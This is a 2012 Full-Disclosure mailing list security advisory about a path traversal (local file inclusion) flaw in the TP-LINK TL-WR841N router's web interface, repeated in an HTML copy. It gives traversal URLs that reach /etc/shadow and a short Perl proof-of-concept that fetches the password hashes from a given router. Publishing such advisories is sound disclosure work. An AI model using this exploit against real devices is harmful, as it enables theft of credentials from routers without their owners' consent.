[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] =| Security Advisory - TP-LINK TL-WR841N LFI |=
From: "Matan Azugi" <pulse () sivanet ! co ! il>
Date: 2012-10-29 0:25:59
Message-ID: 003601cdb56b$f99879e0$ecc96da0$ () sivanet ! co ! il
[Download RAW message or body]
This is a multipart message in MIME format.
[Attachment #2 (multipart/alternative)]
This is a multipart message in MIME format.
=| Security Advisory - TP-LINK TL-WR841N LFI |=
Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
Firmware Version: 3.13.9 Build 120201 Rel.54965n And Below Versions
Discovered Date: 24/10/2012
Author: Matan Azugi [matan@madsec.co.il]
Product Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N
Details:
TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion(LFI)
Vulnerability.
The vulnerability exists in Web-Based Management. The URL parameter is not
properly sanitized before being used.
Exploitation URL:
<http://192.168.0.1/../../../../../../../etc/shadow>
http://192.168.0.1/help/../../../../../../../../etc/shadow
Successful exploitation allows viewing the router configuration and password
files.
Proof of Concept Code:
#TP-LINK TL-WR841N Shadow file grabber#
#built by Pulse matan@madsec.co.il#
#enjoy#
use LWP::UserAgent;
$host = $ARGV[0];
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
my $ua = LWP::UserAgent->new;
$ua->timeout(30);
$lfi = "/help/../../../../../../../../etc/shadow";
$url = $host.$lfi;
$request = HTTP::Request->new('GET', $url);
$response = $ua->request($request);
my $html = $response->content;
if($html =~ /root/) {
print "root$' \n" ;
}
Thank You,
Matan Azugi, MCSE OSCP
<http://www.madsec.co.il> http://www.madsec.co.il
[Attachment #5 (text/html)]
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" \
xmlns:w="urn:schemas-microsoft-com:office:word" \
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" \
xmlns="http://www.w3.org/TR/REC-html40"><head><META HTTP-EQUIV="Content-Type" \
CONTENT="text/html; charset=us-ascii"><meta name=Generator content="Microsoft Word 14 (filtered \
medium)"><style><!-- /* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin-top:0cm;
margin-right:0cm;
margin-bottom:10.0pt;
margin-left:0cm;
text-align:right;
line-height:115%;
direction:rtl;
unicode-bidi:embed;
font-size:11.0pt;
font-family:"Calibri","sans-serif";}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:purple;
text-decoration:underline;}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:"Calibri","sans-serif";
color:windowtext;}
span.apple-style-span
{mso-style-name:apple-style-span;}
span.apple-converted-space
{mso-style-name:apple-converted-space;}
.MsoChpDefault
{mso-style-type:export-only;
font-family:"Calibri","sans-serif";}
@page WordSection1
{size:612.0pt 792.0pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;}
div.WordSection1
{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple><div \
class=WordSection1><p class=MsoNormal \
style='text-align:left;direction:ltr;unicode-bidi:embed'><span class=apple-style-span><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'>=| \
Security Advisory - TP-LINK TL-WR841N LFI |=</span></span><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'><br><br><span \
class=apple-style-span>Issue: TL-WR841N 300Mbps Wireless N Router by \
"TP-LINK"</span><br></span><span class=apple-style-span><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'>Firmware \
Version: 3.13.9 Build 120201 Rel.54965n And Below Versions</span></span><span \
class=apple-style-span><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'><o:p></o:p></span></span></p><p \
class=MsoNormal style='text-align:left;direction:ltr;unicode-bidi:embed'><span \
class=apple-style-span><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'>Discovered \
Date: 24/10/2012</span></span><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'><br><span \
class=apple-style-span>Author: Matan Azugi [matan@madsec.co.il]</span><br><span \
class=apple-style-span>Product Vendor: </span></span><a \
href="http://www.tp-link.com/en/products/details/?model=TL-WR841N">http://www.tp-link.com/en/products/details/?model=TL-WR841N</a><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'> \
<br><br><span class=apple-style-span><b>Details:</b></span><b><br></b><br><span \
class=apple-style-span>TP-LINK TL-WR841N Wireless Router is prone to a Local File \
Inclusion(LFI) Vulnerability.</span><br><span class=apple-style-span>The vulnerability exists \
in Web-Based Management. The URL parameter is not properly sanitized before being \
used</span>.<br><br><span class=apple-style-span><o:p></o:p></span></span></p><p \
class=MsoNormal style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
class=apple-style-span><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black'>Exploitation URL: \
</span></span><span style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black'><br><br></span><a \
href="http://192.168.0.1/../../../../../../../etc/shadow"><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif"'>http://192.168.0.1/help/../../../../../../../../etc/shadow</span></a><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black'><br><br><span \
class=apple-style-span>Successful exploitation allows viewing the router \
configuration</span><span class=apple-converted-space> </span><span \
class=apple-style-span>and password files.</span><br><br><span class=apple-style-span>Proof of \
Concept Code: </span><br><br><span style='background:lime;mso-highlight:lime'>#TP-LINK \
TL-WR841N Shadow file grabber#</span></span><span \
style='background:lime;mso-highlight:lime'><o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>#built \
by Pulse matan@madsec.co.il#<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>#enjoy#<o:p></o:p></span></p><p \
class=MsoNormal style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'><o:p> </o:p></span></p><p \
class=MsoNormal style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>use \
LWP::UserAgent;</span><span lang=HE dir=RTL \
style='font-size:10.5pt;font-family:"Arial","sans-serif";color:black;background:lime;mso-highlight:lime'><o:p></o:p></span></p><p \
class=MsoNormal style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
dir=LTR></span><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'><span \
dir=LTR></span>$host = $ARGV[0];<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>chomp($host);<o:p></o:p></span></p><p \
class=MsoNormal style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>if($host \
!~ /http:\/\//) { $host = "http://$host"; };<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'><o:p> </o:p></span></p><p \
class=MsoNormal style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>my \
$ua = LWP::UserAgent->new;</span><span lang=HE dir=RTL \
style='font-size:10.5pt;font-family:"Arial","sans-serif";color:black;background:lime;mso-highlight:lime'><o:p></o:p></span></p><p \
class=MsoNormal style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
dir=LTR></span><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'><span \
dir=LTR></span>$ua->timeout(30);<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>$lfi \
= "/help/../../../../../../../../etc/shadow";<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>$url \
= $host.$lfi;<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>$request \
= HTTP::Request->new('GET', $url);<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>$response \
= $ua->request($request);<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>my \
$html = $response->content; \
<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>if($html \
=~ /root/) {<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>print \
"root$' \n" ;<o:p></o:p></span></p><p class=MsoNormal \
style='text-align:left;line-height:normal;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black;background:lime;mso-highlight:lime'>}</span><span \
style='font-size:10.5pt;font-family:"Verdana","sans-serif";color:black'><o:p></o:p></span></p><p \
class=MsoNormal style='text-align:left;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'><br><br><span \
class=apple-style-span>Thank You, </span><br><span class=apple-style-span>Matan Azugi, MCSE \
OSCP</span><br></span><a href="http://www.madsec.co.il"><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif"'>http://www.madsec.co.il</span></a><span \
class=apple-style-span><span lang=HE dir=RTL \
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></span></p><p class=MsoNormal \
style='text-align:left;direction:ltr;unicode-bidi:embed'><span \
style='font-size:10.5pt;line-height:115%;font-family:"Verdana","sans-serif";color:black'><br><br></span><o:p></o:p></p><p \
class=MsoNormal dir=RTL><span lang=HE \
style='font-family:"Arial","sans-serif"'><o:p> </o:p></span></p></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic